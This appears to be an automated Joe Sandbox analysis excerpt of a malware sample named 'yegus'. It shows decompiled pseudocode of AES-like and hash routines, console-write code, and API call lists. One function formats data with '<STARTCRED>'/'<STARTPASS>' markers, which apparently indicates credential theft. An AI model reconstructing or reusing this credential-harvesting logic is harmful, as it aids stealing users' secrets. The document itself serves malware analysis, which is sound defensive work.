    0x01331245
    0x013312d5
    0x013312de
    0x013312e4
    0x013312fb
    0x01331301
    0x0133131d
    0x01331320
    0x01331337
    0x01331344
    0x01331344
    0x0133124b
    0x0133124b
    0x0133124e
    0x013312a8
    0x013312bb
    0x013312bd
    0x013312bd
    0x013312c4
    0x013312c6
    0x013312c6
    0x013312cc
    0x013312cc
    0x01331348
    0x0133134b
    0x0133134e
    0x01331351
    0x0133136a

    Memory Dump Source
    • Source File: 00000002.00000002.1556466842.01331000.00000020.sdmp, Offset: 01330000, based on PE: true
    • Associated: 00000002.00000002.1556452083.01330000.00000002.sdmp
    • Associated: 00000002.00000002.1556498423.01340000.00000002.sdmp
    • Associated: 00000002.00000002.1556522255.01347000.00000004.sdmp
    • Associated: 00000002.00000002.1556531618.01349000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_1330000_yegus.jbxd
    Function 013315E0, Relevance: .1, Instructions: 144Crypto
    C-Code - Quality: 100%
    			E013315E0(signed char* __ecx) {
				signed char* _v8;
				intOrPtr _v12;
				signed char _t278;
				signed char* _t279;
				signed char* _t281;
				signed char* _t283;
				signed char* _t285;
				signed int _t287;
				signed int _t289;
				signed int _t291;
				signed int _t293;
				intOrPtr _t294;
				signed int _t296;
				signed int _t298;
				signed int _t300;
				signed int _t301;
				signed int _t302;
				signed int _t303;
				signed int _t304;
				signed int _t305;
				signed int _t306;
				signed int _t307;
				signed int _t308;

				_v8 = __ecx;
				_t279 = _v8;
				_v12 = ( *__ecx & 0x000000ff) + ( *__ecx & 0x000000ff) * 2 + ( *__ecx & 0x000000ff) + ( *__ecx & 0x000000ff) * 2;
				_t294 = _v12;
				_t301 = (__ecx[4] & 0x000000ff) + (__ecx[4] & 0x000000ff) * 2;
				_t305 = (__ecx[8] & 0x000000ff) + (__ecx[8] & 0x000000ff) * 2;
				_t287 = (__ecx[0xc] & 0x000000ff) + (__ecx[0xc] & 0x000000ff) * 2;
				 *_t279 =  *(0x1344aaa + _t287 * 2) & 0x000000ff ^  *(0x1344aac + _t305 * 2) ^  *(0x1344aab + _t301 * 2) ^  *(_t294 + 0x1344aad);
				_t279[4] =  *(0x1344aac + _t287 * 2) & 0x000000ff ^  *(0x1344aab + _t305 * 2) ^  *(0x1344aad + _t301 * 2) ^  *(_t294 + 0x1344aaa);
				_t279[8] =  *(0x1344aab + _t287 * 2) & 0x000000ff ^  *(0x1344aad + _t305 * 2) ^  *(0x1344aaa + _t301 * 2) ^  *(_t294 + 0x1344aac);
				_t279[0xc] =  *(0x1344aad + _t287 * 2) & 0x000000ff ^  *(0x1344aaa + _t305 * 2) ^  *(0x1344aac + _t301 * 2) ^  *(_t294 + 0x1344aab);
				_t302 = (_t279[1] & 0x000000ff) + (_t279[1] & 0x000000ff) * 2;
				_t306 = (_t279[5] & 0x000000ff) + (_t279[5] & 0x000000ff) * 2;
				_t296 = (_t279[9] & 0x000000ff) + (_t279[9] & 0x000000ff) * 2;
				_t281 = _v8;
				_t289 = (_t279[0xd] & 0x000000ff) + (_t279[0xd] & 0x000000ff) * 2;
				 *(_t281 + 1) =  *(0x1344aaa + _t289 * 2) & 0x000000ff ^  *(0x1344aac + _t296 * 2) ^  *(0x1344aab + _t306 * 2) ^  *(0x1344aad + _t302 * 2);
				 *(_t281 + 5) =  *(0x1344aac + _t289 * 2) & 0x000000ff ^  *(0x1344aab + _t296 * 2) ^  *(0x1344aad + _t306 * 2) ^  *(0x1344aaa + _t302 * 2);
				 *(_t281 + 9) =  *(0x1344aab + _t289 * 2) & 0x000000ff ^  *(0x1344aad + _t296 * 2) ^  *(0x1344aaa + _t306 * 2) ^  *(0x1344aac + _t302 * 2);
				 *(_t281 + 0xd) =  *(0x1344aad + _t289 * 2) & 0x000000ff ^  *(0x1344aaa + _t296 * 2) ^  *(0x1344aac + _t306 * 2) ^  *(0x1344aab + _t302 * 2);
				_t303 = ( *(_t281 + 2) & 0x000000ff) + ( *(_t281 + 2) & 0x000000ff) * 2;
				_t307 = ( *(_t281 + 6) & 0x000000ff) + ( *(_t281 + 6) & 0x000000ff) * 2;
				_t298 = ( *(_t281 + 0xa) & 0x000000ff) + ( *(_t281 + 0xa) & 0x000000ff) * 2;
				_t291 = ( *(_t281 + 0xe) & 0x000000ff) + ( *(_t281 + 0xe) & 0x000000ff) * 2;
				_t283 = _v8;
				 *(_t283 + 2) =  *(0x1344aaa + _t291 * 2) & 0x000000ff ^  *(0x1344aac + _t298 * 2) ^  *(0x1344aab + _t307 * 2) ^  *(0x1344aad + _t303 * 2);
				 *(_t283 + 6) =  *(0x1344aac + _t291 * 2) & 0x000000ff ^  *(0x1344aab + _t298 * 2) ^  *(0x1344aad + _t307 * 2) ^  *(0x1344aaa + _t303 * 2);
				 *(_t283 + 0xa) =  *(0x1344aab + _t291 * 2) & 0x000000ff ^  *(0x1344aad + _t298 * 2) ^  *(0x1344aaa + _t307 * 2) ^  *(0x1344aac + _t303 * 2);
				 *(_t283 + 0xe) =  *(0x1344aad + _t291 * 2) & 0x000000ff ^  *(0x1344aaa + _t298 * 2) ^  *(0x1344aac + _t307 * 2) ^  *(0x1344aab + _t303 * 2);
				_t304 = ( *(_t283 + 3) & 0x000000ff) + ( *(_t283 + 3) & 0x000000ff) * 2;
				_t308 = ( *(_t283 + 7) & 0x000000ff) + ( *(_t283 + 7) & 0x000000ff) * 2;
				_t300 = ( *(_t283 + 0xb) & 0x000000ff) + ( *(_t283 + 0xb) & 0x000000ff) * 2;
				_t285 = _v8;
				_t293 = ( *(_t283 + 0xf) & 0x000000ff) + ( *(_t283 + 0xf) & 0x000000ff) * 2;
				_t285[3] =  *(0x1344aaa + _t293 * 2) & 0x000000ff ^  *(0x1344aac + _t300 * 2) ^  *(0x1344aab + _t308 * 2) ^  *(0x1344aad + _t304 * 2);
				_t285[7] =  *(0x1344aac + _t293 * 2) & 0x000000ff ^  *(0x1344aab + _t300 * 2) ^  *(0x1344aad + _t308 * 2) ^  *(0x1344aaa + _t304 * 2);
				_t285[0xb] =  *(0x1344aab + _t293 * 2) & 0x000000ff ^  *(0x1344aad + _t300 * 2) ^  *(0x1344aaa + _t308 * 2) ^  *(0x1344aac + _t304 * 2);
				_t278 =  *(0x1344aad + _t293 * 2) & 0x000000ff ^  *(0x1344aaa + _t300 * 2) ^  *(0x1344aac + _t308 * 2) ^  *(0x1344aab + _t304 * 2);
				_t285[0xf] = _t278;
				return _t278;
			}


























    0x013315ef
    0x013315f4
    0x013315f7
    0x013315fe
    0x01331601
    0x01331608
    0x0133160f
    0x0133162e
    0x0133164c
    0x0133166b
    0x0133168d
    0x0133169c
    0x013316a2
    0x013316a8
    0x013316ae
    0x013316b1
    0x013316d1
    0x013316f1
    0x01331711
    0x01331737
    0x01331743
    0x01331749
    0x0133174f
    0x01331755
    0x01331758
    0x01331778
    0x01331798
    0x013317b8
    0x013317de
    0x013317ea
    0x013317f0
    0x013317f6
    0x013317fc
    0x013317ff
    0x0133181f
    0x0133183f
    0x0133185f
    0x01331878
    0x01331881
    0x01331888

    Memory Dump Source
    • Source File: 00000002.00000002.1556466842.01331000.00000020.sdmp, Offset: 01330000, based on PE: true
    • Associated: 00000002.00000002.1556452083.01330000.00000002.sdmp
    • Associated: 00000002.00000002.1556498423.01340000.00000002.sdmp
    • Associated: 00000002.00000002.1556522255.01347000.00000004.sdmp
    • Associated: 00000002.00000002.1556531618.01349000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_1330000_yegus.jbxd
    Function 013332D0, Relevance: .1, Instructions: 129Crypto
    C-Code - Quality: 97%
    			E013332D0(intOrPtr __ecx, char* __edx) {
				void* __edi;
				intOrPtr _t77;
				unsigned int _t123;
				int _t125;
				char* _t130;
				void* _t157;
				void* _t164;
				void* _t165;
				void* _t166;
				void* _t167;
				intOrPtr _t170;
				void* _t171;

				_t170 = __ecx;
				_t130 = __edx;
				_t77 =  *((intOrPtr*)(__ecx + 0x40));
				 *((char*)(_t77 + __ecx)) = 0x80;
				_t157 = _t77 + 1;
				if(_t77 >= 0x38) {
					if(_t157 < 0x40) {
						_t165 = _t157 + __ecx;
						_t125 = memset(_t165, 0, 0x40 << 2);
						_t166 = _t165 + (0x40 - _t157 >> 2);
						memset(_t166, _t125, 0 << 0);
						_t171 = _t171 + 0x18;
						_t164 = _t166;
					}
					E01332B70(_t170, _t170);
					E01336200(_t164, _t170, 0, 0x38);
				} else {
					if(_t157 < 0x38) {
						_t167 = _t157 + __ecx;
						memset(_t167 + (0x38 - _t157 >> 2), memset(_t167, 0, 0x38 << 2), 0 << 0);
					}
				}
				 *(_t170 + 0x48) =  *(_t170 + 0x48) + ( *(_t170 + 0x40) << 3);
				asm("adc dword [esi+0x4c], 0x0");
				 *((char*)(_t170 + 0x38)) =  *(_t170 + 0x48) & 0x000000ff;
				 *((char*)(_t170 + 0x39)) = ( *(_t170 + 0x4c) << 0x00000020 |  *(_t170 + 0x48)) >> 8;
				 *((char*)(_t170 + 0x3a)) = ( *(_t170 + 0x4c) << 0x00000020 |  *(_t170 + 0x48)) >> 0x10;
				 *((char*)(_t170 + 0x3b)) = ( *(_t170 + 0x4c) << 0x00000020 |  *(_t170 + 0x48)) >> 0x18;
				 *((char*)(_t170 + 0x3c)) = E0133F390( *(_t170 + 0x48), 0x20,  *(_t170 + 0x4c));
				 *((char*)(_t170 + 0x3d)) = E0133F390( *(_t170 + 0x48), 0x28,  *(_t170 + 0x4c));
				 *((char*)(_t170 + 0x3e)) =  *(_t170 + 0x4e) & 0x000000ff;
				 *((char*)(_t170 + 0x3f)) =  *(_t170 + 0x4f) & 0x000000ff;
				E01332B70(_t170, _t170);
				 *_t130 =  *(_t170 + 0x50);
				 *((char*)(_t130 + 4)) =  *(_t170 + 0x54);
				 *((char*)(_t130 + 8)) =  *(_t170 + 0x58);
				 *((char*)(_t130 + 0xc)) =  *(_t170 + 0x5c);
				 *((char*)(_t130 + 1)) =  *(_t170 + 0x50) >> 8;
				 *((char*)(_t130 + 5)) =  *(_t170 + 0x54) >> 8;
				 *((char*)(_t130 + 9)) =  *(_t170 + 0x58) >> 8;
				 *((char*)(_t130 + 0xd)) =  *(_t170 + 0x5c) >> 8;
				 *((char*)(_t130 + 2)) =  *(_t170 + 0x50) >> 0x10;
				 *((char*)(_t130 + 6)) =  *(_t170 + 0x54) >> 0x10;
				 *((char*)(_t130 + 0xa)) =  *(_t170 + 0x58) >> 0x10;
				 *((char*)(_t130 + 0xe)) =  *(_t170 + 0x5c) >> 0x10;
				 *((char*)(_t130 + 3)) =  *(_t170 + 0x50) >> 0x18;
				 *((char*)(_t130 + 7)) =  *(_t170 + 0x54) >> 0x18;
				 *((char*)(_t130 + 0xb)) =  *(_t170 + 0x58) >> 0x18;
				_t123 =  *(_t170 + 0x5c) >> 0x18;
				 *(_t130 + 0xf) = _t123;
				return _t123;
			}















    0x013332d2
    0x013332d4
    0x013332d7
    0x013332da
    0x013332de
    0x013332e4
    0x0133330a
    0x01333311
    0x0133331d
    0x0133331d
    0x01333324
    0x01333324
    0x01333324
    0x01333324
    0x0133332a
    0x01333334
    0x013332e6
    0x013332e9
    0x013332f0
    0x01333303
    0x01333303
    0x013332e9
    0x01333342
    0x01333345
    0x0133334d
    0x0133335a
    0x0133336a
    0x0133337a
    0x0133338d
    0x0133339d
    0x013333a8
    0x013333af
    0x013333b2
    0x013333ba
    0x013333bf
    0x013333c5
    0x013333cb
    0x013333d4
    0x013333dd
    0x013333e6
    0x013333ef
    0x013333f8
    0x01333401
    0x0133340a
    0x01333413
    0x0133341c
    0x01333425
    0x0133342e
    0x01333434
    0x01333439
    0x0133343d

    Memory Dump Source
    • Source File: 00000002.00000002.1556466842.01331000.00000020.sdmp, Offset: 01330000, based on PE: true
    • Associated: 00000002.00000002.1556452083.01330000.00000002.sdmp
    • Associated: 00000002.00000002.1556498423.01340000.00000002.sdmp
    • Associated: 00000002.00000002.1556522255.01347000.00000004.sdmp
    • Associated: 00000002.00000002.1556531618.01349000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_1330000_yegus.jbxd
    Function 10008D50, Relevance: .1, Instructions: 95
    Memory Dump Source
    • Source File: 00000002.00000002.1560994638.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000002.00000002.1560988347.10000000.00000040.sdmp
    • Associated: 00000002.00000002.1561119037.10090000.00000002.sdmp
    • Associated: 00000002.00000002.1561138043.100A0000.00000004.sdmp
    • Associated: 00000002.00000002.1561146545.100A3000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_10000000_yegus.jbxd
    Function 01331370, Relevance: .1, Instructions: 53Crypto
    C-Code - Quality: 100%
    			E01331370(signed int* __ecx, signed int* __edx) {
				signed char _t40;
				unsigned int _t41;
				unsigned int _t43;
				unsigned int _t45;
				unsigned int _t47;

				_t41 =  *__edx;
				__ecx[3] = __ecx[3] ^  *__edx;
				__ecx[3] = __ecx[3] ^ __edx[1];
				__ecx[3] = __ecx[3] ^ __edx[2];
				_t40 = __edx[3];
				__ecx[3] = __ecx[3] ^ _t40;
				__ecx[2] = __ecx[2] ^ _t41 >> 0x00000008;
				_t43 = __edx[1];
				 *__ecx =  *__ecx ^ _t41 >> 0x00000018;
				__ecx[1] = __ecx[1] ^ _t41 >> 0x00000010;
				__ecx[2] = __ecx[2] ^ _t43 >> 0x00000008;
				_t45 = __edx[2];
				__ecx[0] = __ecx[0] ^ _t43 >> 0x00000018;
				__ecx[1] = __ecx[1] ^ _t43 >> 0x00000010;
				__ecx[2] = __ecx[2] ^ _t45 >> 0x00000008;
				_t47 = __edx[3];
				__ecx[0] = __ecx[0] ^ _t45 >> 0x00000018;
				__ecx[1] = __ecx[1] ^ _t45 >> 0x00000010;
				__ecx[2] = __ecx[2] ^ _t47 >> 0x00000008;
				__ecx[0] = __ecx[0] ^ _t47 >> 0x00000018;
				__ecx[1] = __ecx[1] ^ _t47 >> 0x00000010;
				return _t40;
			}








    0x01331377
    0x0133137f
    0x01331385
    0x0133138b
    0x0133138e
    0x01331391
    0x01331397
    0x0133139a
    0x013313a0
    0x013313a7
    0x013313af
    0x013313b2
    0x013313b8
    0x013313c0
    0x013313c8
    0x013313cb
    0x013313d1
    0x013313d9
    0x013313e1
    0x013313e7
    0x013313ed
    0x013313f3

    Memory Dump Source
    • Source File: 00000002.00000002.1556466842.01331000.00000020.sdmp, Offset: 01330000, based on PE: true
    • Associated: 00000002.00000002.1556452083.01330000.00000002.sdmp
    • Associated: 00000002.00000002.1556498423.01340000.00000002.sdmp
    • Associated: 00000002.00000002.1556522255.01347000.00000004.sdmp
    • Associated: 00000002.00000002.1556531618.01349000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_1330000_yegus.jbxd
    Function 100018A0, Relevance: 31.7, APIs: 15, Strings: 3, Instructions: 168stringfile
    APIs
      • Part of subcall function 10081DF0: CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000), ref: 10081E04
      • Part of subcall function 10081DF0: CloseHandle.KERNEL32(00000000), ref: 10081E22
      • Part of subcall function 10081DF0: GetFileSize.KERNEL32(00000000,00000000,?,?,80000000,00000003,00000000,00000003,00000000,00000000,?,?,100018BC), ref: 10081E2D
      • Part of subcall function 10081DF0: CreateFileMappingA.KERNEL32(00000000,00000000,00000008,00000000,00000000,00000000), ref: 10081E40
      • Part of subcall function 10081DF0: MapViewOfFile.KERNEL32(00000000,00000001,00000000,00000000,00000000,?,?,80000000,00000003,00000000,00000003,00000000,00000000,?,?,100018BC), ref: 10081E55
      • Part of subcall function 10081DF0: CloseHandle.KERNEL32(00000000), ref: 10081E64
      • Part of subcall function 10081DF0: CloseHandle.KERNEL32(00000000), ref: 10081E67
      • Part of subcall function 10082290: lstrlenA.KERNEL32(?,?,?,?,"hostname":","hostname":",?), ref: 100822BA
      • Part of subcall function 10082290: lstrlenA.KERNEL32(?,?,?,"hostname":","hostname":",?), ref: 100822D9
      • Part of subcall function 10082290: lstrlenA.KERNEL32(?,?,?,"hostname":","hostname":",?), ref: 100822E4
      • Part of subcall function 10082290: HeapAlloc.KERNEL32(00000008,?,?,?,?,?,"hostname":","hostname":",?), ref: 10082326
      • Part of subcall function 10082290: lstrlenA.KERNEL32(?,?,?,?,?,"hostname":","hostname":",?), ref: 10082339
      • Part of subcall function 10082290: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 10082393
    • lstrlenA.KERNEL32(00000000), ref: 10001908
    • lstrlenA.KERNEL32(00000000), ref: 1000192F
    • lstrlenA.KERNEL32(00000000), ref: 10001956
    • HeapFree.KERNEL32(00000000,00000000), ref: 10001A61
      • Part of subcall function 10001700: lstrlenA.KERNEL32 ref: 10001725
      • Part of subcall function 10001700: HeapAlloc.KERNEL32(00000008,?), ref: 1000176D
    • HeapFree.KERNEL32(00000000,?), ref: 100019B7
    • HeapFree.KERNEL32(00000000,?), ref: 100019C4
    • HeapFree.KERNEL32(00000000,00000000), ref: 10001A1E
      • Part of subcall function 10001000: lstrlenW.KERNEL32(<STARTCRED>,00000000,00000000,00000000,?), ref: 10001021
      • Part of subcall function 10001000: lstrlenW.KERNEL32(<STARTPASS>,00000000), ref: 1000104D
      • Part of subcall function 10001000: lstrlenW.KERNEL32(<ENDCRED>,00000000), ref: 10001075
      • Part of subcall function 10001000: lstrlenW.KERNEL32(10094C54), ref: 10001093
    • HeapFree.KERNEL32(00000000,00000000), ref: 100019EA
    • HeapFree.KERNEL32(00000000,00000000), ref: 100019F8
    • HeapFree.KERNEL32(00000000,00000000), ref: 10001A03
    • HeapFree.KERNEL32(00000000,00000000), ref: 10001A11
    • HeapFree.KERNEL32(00000000,00000000), ref: 10001A2E
    • HeapFree.KERNEL32(00000000,00000000), ref: 10001A40
    • HeapFree.KERNEL32(00000000,?), ref: 10001A52
    • UnmapViewOfFile.KERNEL32(?), ref: 10001A93
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1560994638.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000002.00000002.1560988347.10000000.00000040.sdmp
    • Associated: 00000002.00000002.1561119037.10090000.00000002.sdmp
    • Associated: 00000002.00000002.1561138043.100A0000.00000004.sdmp
    • Associated: 00000002.00000002.1561146545.100A3000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_10000000_yegus.jbxd
    Function 10003B70, Relevance: 24.9, APIs: 6, Strings: 8, Instructions: 353
    APIs
      • Part of subcall function 10002C20: __alldiv.INT64 ref: 10002C67
      • Part of subcall function 10002D40: __allrem.INT64 ref: 10002D6A
    • __alldiv.INT64 ref: 10003E49
    • __alldiv.INT64 ref: 10003E73
    • __allrem.INT64 ref: 10003E7E
    • __alldiv.INT64 ref: 10003F23
    • __alldiv.INT64 ref: 10003F5E
    • __allrem.INT64 ref: 10003F69
      • Part of subcall function 100827BA: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 100827FE
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1560994638.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000002.00000002.1560988347.10000000.00000040.sdmp
    • Associated: 00000002.00000002.1561119037.10090000.00000002.sdmp
    • Associated: 00000002.00000002.1561138043.100A0000.00000004.sdmp
    • Associated: 00000002.00000002.1561146545.100A3000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_10000000_yegus.jbxd
    Function 1008B8AC, Relevance: 10.8, APIs: 7, Instructions: 268
    APIs
    • GetCPInfo.KERNEL32(003AA4C0,003AA4C0,?,7FFFFFFF,?,?,1008BB85,003AA4C0,003AA4C0,?,003AA4C0,?,?,?,?,003AA4C0), ref: 1008B958
    • MultiByteToWideChar.KERNEL32(003AA4C0,00000009,003AA4C0,003AA4C0,00000000,00000000,?,1008BB85,003AA4C0,003AA4C0,?,003AA4C0,?,?,?,?), ref: 1008B9DB
    • MultiByteToWideChar.KERNEL32(003AA4C0,00000001,003AA4C0,003AA4C0,00000000,1008BB85,?,1008BB85,003AA4C0,003AA4C0,?,003AA4C0,?,?,?,?), ref: 1008BA6E
    • MultiByteToWideChar.KERNEL32(003AA4C0,00000009,003AA4C0,003AA4C0,00000000,00000000,?,1008BB85,003AA4C0,003AA4C0,?,003AA4C0,?,?,?,?), ref: 1008BA85
      • Part of subcall function 10086449: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,10088306,00000000,?,?,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 1008647B
    • MultiByteToWideChar.KERNEL32(003AA4C0,00000001,003AA4C0,003AA4C0,00000000,003AA4C0,?,1008BB85,003AA4C0,003AA4C0,?,003AA4C0,?,?,?,?), ref: 1008BB01
      • Part of subcall function 10086E33: CompareStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?), ref: 10086E90
    • __freea.LIBCMT ref: 1008BB2C
    • __freea.LIBCMT ref: 1008BB38
      • Part of subcall function 100827BA: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 100827FE
    Memory Dump Source
    • Source File: 00000002.00000002.1560994638.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000002.00000002.1560988347.10000000.00000040.sdmp
    • Associated: 00000002.00000002.1561119037.10090000.00000002.sdmp
    • Associated: 00000002.00000002.1561138043.100A0000.00000004.sdmp
    • Associated: 00000002.00000002.1561146545.100A3000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_10000000_yegus.jbxd
    Function 0133C1A7, Relevance: 10.7, APIs: 7, Instructions: 152file
    C-Code - Quality: 75%
    			E0133C1A7(intOrPtr* _a4, signed int _a8, signed char* _a12, intOrPtr _a16) {
				signed int _v8;
				signed char _v15;
				char _v16;
				void _v24;
				short _v28;
				char _v31;
				void _v32;
				long _v36;
				intOrPtr _v40;
				void* _v44;
				signed int _v48;
				signed char* _v52;
				long _v56;
				int _v60;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t78;
				signed int _t80;
				int _t86;
				void* _t94;
				long _t97;
				void _t105;
				void* _t112;
				signed int _t115;
				signed int _t117;
				signed char _t122;
				signed char _t127;
				intOrPtr _t128;
				signed int _t130;
				signed char* _t131;
				intOrPtr* _t132;
				signed int _t133;
				void* _t134;

				_t78 =  *0x1347004; // 0x262637d3
				_v8 = _t78 ^ _t133;
				_t80 = _a8;
				_t117 = _t80 >> 6;
				_t115 = (_t80 & 0x0000003f) * 0x30;
				_t131 = _a12;
				_v52 = _t131;
				_v48 = _t117;
				_v44 =  *((intOrPtr*)( *((intOrPtr*)(0x1347f00 + _t117 * 4)) + _t115 + 0x18));
				_v40 = _a16 + _t131;
				_t86 = GetConsoleCP();
				_t132 = _a4;
				_v60 = _t86;
				 *_t132 = 0;
				 *((intOrPtr*)(_t132 + 4)) = 0;
				 *((intOrPtr*)(_t132 + 8)) = 0;
				while(_t131 < _v40) {
					_v28 = 0;
					_v31 =  *_t131;
					_t128 =  *((intOrPtr*)(0x1347f00 + _v48 * 4));
					_t122 =  *(_t128 + _t115 + 0x2d);
					if((_t122 & 0x00000004) == 0) {
						if(( *(E0133AD91(_t115, _t128) + ( *_t131 & 0x000000ff) * 2) & 0x00008000) == 0) {
							_push(1);
							_push(_t131);
							goto L8;
						} else {
							if(_t131 >= _v40) {
								_t130 = _v48;
								 *((char*)( *((intOrPtr*)(0x1347f00 + _t130 * 4)) + _t115 + 0x2e)) =  *_t131;
								 *( *((intOrPtr*)(0x1347f00 + _t130 * 4)) + _t115 + 0x2d) =  *( *((intOrPtr*)(0x1347f00 + _t130 * 4)) + _t115 + 0x2d) | 0x00000004;
								 *((intOrPtr*)(_t132 + 4)) =  *((intOrPtr*)(_t132 + 4)) + 1;
							} else {
								_t112 = E0133BF43( &_v28, _t131, 2);
								_t134 = _t134 + 0xc;
								if(_t112 != 0xffffffff) {
									_t131 =  &(_t131[1]);
									goto L9;
								}
							}
						}
					} else {
						_t127 = _t122 & 0x000000fb;
						_v16 =  *((intOrPtr*)(_t128 + _t115 + 0x2e));
						_push(2);
						_v15 = _t127;
						 *(_t128 + _t115 + 0x2d) = _t127;
						_push( &_v16);
						L8:
						_push( &_v28);
						_t94 = E0133BF43();
						_t134 = _t134 + 0xc;
						if(_t94 != 0xffffffff) {
							L9:
							_t131 =  &(_t131[1]);
							_t97 = WideCharToMultiByte(_v60, 0,  &_v28, 1,  &_v24, 5, 0, 0);
							_v56 = _t97;
							if(_t97 != 0) {
								if(WriteFile(_v44,  &_v24, _t97,  &_v36, 0) == 0) {
									L19:
									 *_t132 = GetLastError();
								} else {
									 *((intOrPtr*)(_t132 + 4)) =  *((intOrPtr*)(_t132 + 8)) - _v52 + _t131;
									if(_v36 >= _v56) {
										if(_v31 != 0xa) {
											goto L16;
										} else {
											_t105 = 0xd;
											_v32 = _t105;
											if(WriteFile(_v44,  &_v32, 1,  &_v36, 0) == 0) {
												goto L19;
											} else {
												if(_v36 >= 1) {
													 *((intOrPtr*)(_t132 + 8)) =  *((intOrPtr*)(_t132 + 8)) + 1;
													 *((intOrPtr*)(_t132 + 4)) =  *((intOrPtr*)(_t132 + 4)) + 1;
													goto L16;
												}
											}
										}
									}
								}
							}
						}
					}
					goto L20;
					L16:
				}
				L20:
				return E01333E82(_t115, _v8 ^ _t133, _t131, _t132);
			}





































    0x0133c1af
    0x0133c1b6
    0x0133c1b9
    0x0133c1c1
    0x0133c1c5
    0x0133c1d1
    0x0133c1d4
    0x0133c1d7
    0x0133c1de
    0x0133c1e6
    0x0133c1e9
    0x0133c1ef
    0x0133c1f5
    0x0133c1fa
    0x0133c1fc
    0x0133c1ff
    0x0133c204
    0x0133c20e
    0x0133c215
    0x0133c218
    0x0133c21f
    0x0133c226
    0x0133c252
    0x0133c278
    0x0133c27a
    0x00000000
    0x0133c254
    0x0133c257
    0x0133c31e
    0x0133c32a
    0x0133c335
    0x0133c33a
    0x0133c25d
    0x0133c264
    0x0133c269
    0x0133c26f
    0x0133c275
    0x00000000
    0x0133c275
    0x0133c26f
    0x0133c257
    0x0133c228
    0x0133c22c
    0x0133c22f
    0x0133c235
    0x0133c237
    0x0133c23a
    0x0133c23e
    0x0133c27b
    0x0133c27e
    0x0133c27f
    0x0133c284
    0x0133c28a
    0x0133c290
    0x0133c29f
    0x0133c2a5
    0x0133c2ab
    0x0133c2b0
    0x0133c2cc
    0x0133c33f
    0x0133c345
    0x0133c2ce
    0x0133c2d6
    0x0133c2df
    0x0133c2e5
    0x00000000
    0x0133c2e7
    0x0133c2e9
    0x0133c2ec
    0x0133c305
    0x00000000
    0x0133c307
    0x0133c30b
    0x0133c30d
    0x0133c310
    0x00000000
    0x0133c310
    0x0133c30b
    0x0133c305
    0x0133c2e5
    0x0133c2df
    0x0133c2cc
    0x0133c2b0
    0x0133c28a
    0x00000000
    0x0133c313
    0x0133c313
    0x0133c347
    0x0133c359

    APIs
    • GetConsoleCP.KERNEL32 ref: 0133C1E9
    • __Stoull.NTSTC_LIBCMT ref: 0133C264
    • __Stoull.NTSTC_LIBCMT ref: 0133C27F
    • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 0133C2A5
    • WriteFile.KERNEL32(?,?,00000000,0133C91C,00000000), ref: 0133C2C4
    • WriteFile.KERNEL32(?,?,00000001,0133C91C,00000000), ref: 0133C2FD
    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,0133C91C,?,00000000,?,00000000,00000000), ref: 0133C33F
      • Part of subcall function 01333E82: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0133412E
    Memory Dump Source
    • Source File: 00000002.00000002.1556466842.01331000.00000020.sdmp, Offset: 01330000, based on PE: true
    • Associated: 00000002.00000002.1556452083.01330000.00000002.sdmp
    • Associated: 00000002.00000002.1556498423.01340000.00000002.sdmp
    • Associated: 00000002.00000002.1556522255.01347000.00000004.sdmp
    • Associated: 00000002.00000002.1556531618.01349000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_1330000_yegus.jbxd
    Function 1008BCD1, Relevance: 10.7, APIs: 7, Instructions: 152file
    APIs
    • GetConsoleCP.KERNEL32 ref: 1008BD13
    • __Stoull.NTSTC_LIBCMT ref: 1008BD8E
    • __Stoull.NTSTC_LIBCMT ref: 1008BDA9
    • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 1008BDCF
    • WriteFile.KERNEL32(?,?,00000000,1008C446,00000000), ref: 1008BDEE
    • WriteFile.KERNEL32(?,?,00000001,1008C446,00000000), ref: 1008BE27
    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,1008C446,?,00000000,?,00000000,00000000), ref: 1008BE69
      • Part of subcall function 100827BA: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 100827FE
    Memory Dump Source
    • Source File: 00000002.00000002.1560994638.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000002.00000002.1560988347.10000000.00000040.sdmp
    • Associated: 00000002.00000002.1561119037.10090000.00000002.sdmp
    • Associated: 00000002.00000002.1561138043.100A0000.00000004.sdmp
    • Associated: 00000002.00000002.1561146545.100A3000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_10000000_yegus.jbxd
    Function 10001000, Relevance: 10.6, APIs: 4, Strings: 3, Instructions: 68string
    APIs
    • lstrlenW.KERNEL32(<STARTCRED>,00000000,00000000,00000000,?), ref: 10001021
